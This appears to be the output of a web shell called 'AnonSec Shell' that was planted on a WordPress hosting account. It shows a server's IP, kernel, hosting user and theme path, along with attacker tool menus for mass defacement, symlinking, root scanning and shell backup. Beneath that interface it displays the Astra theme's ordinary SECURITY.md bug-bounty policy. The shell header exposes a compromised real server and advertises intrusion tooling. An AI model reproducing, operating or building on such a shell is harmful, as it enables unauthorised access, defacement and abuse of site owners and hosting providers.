AnonSec Shell
Server IP : 198.54.125.146  /  Your IP : 3.142.172.179   [ Reverse IP ]
Web Server : LiteSpeed
System : Linux business38.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
User : engixevu ( 716)
PHP Version : 8.1.31
Disable Function : NONE
Domains : 1 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/engixevu/smartjobbox.com/wp-content/themes/astra/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home/engixevu/smartjobbox.com/wp-content/themes/astra//SECURITY.md
# Security Policy

Thank you for your interest in helping us improve the security of our open source products, websites and other properties.

We have created this Bug Bounty program to appreciate and reward your efforts.

## Reporting a Vulnerability

Please report (suspected) security vulnerabilities to
**[support+security@bsf.io](mailto:support+security@bsf.io)**. You will receive a response from
us within 48 hours. If the issue is confirmed, we will release a patch as soon
as possible depending on complexity but historically within a few days.

We have [a bug bounty program](https://brainstormforce.com/bug-bounty-program/) too which gives people guidelines on how a report should be reported and how we can reward them for proper reporting.

If our  team cannot reproduce and verify an issue, a bounty cannot be awarded. To help streamline our intake process, we ask that submissions include:

- Description of the vulnerability
- Steps to reproduce the reported vulnerability
- Proof of exploitability (e.g. screenshot, video)
- Perceived impact to another user or the organization
- Proposed CVSSv3 Vector & Score (without environmental and temporal modifiers)
- List of URLs and affected parameters
- Other vulnerable URLs, additional payloads, Proof-of-Concept code
- Browser, OS and/or app version used during testing
- Impact of the bug

Security reports should be sent to **[support+security@bsf.io](mailto:support+security@bsf.io)**

For more details, please [visit this page](https://brainstormforce.com/bug-bounty-program/).

Once again, thank you for helping us improve security. We really appreciate it.

Anon7 - 2022
AnonSec Team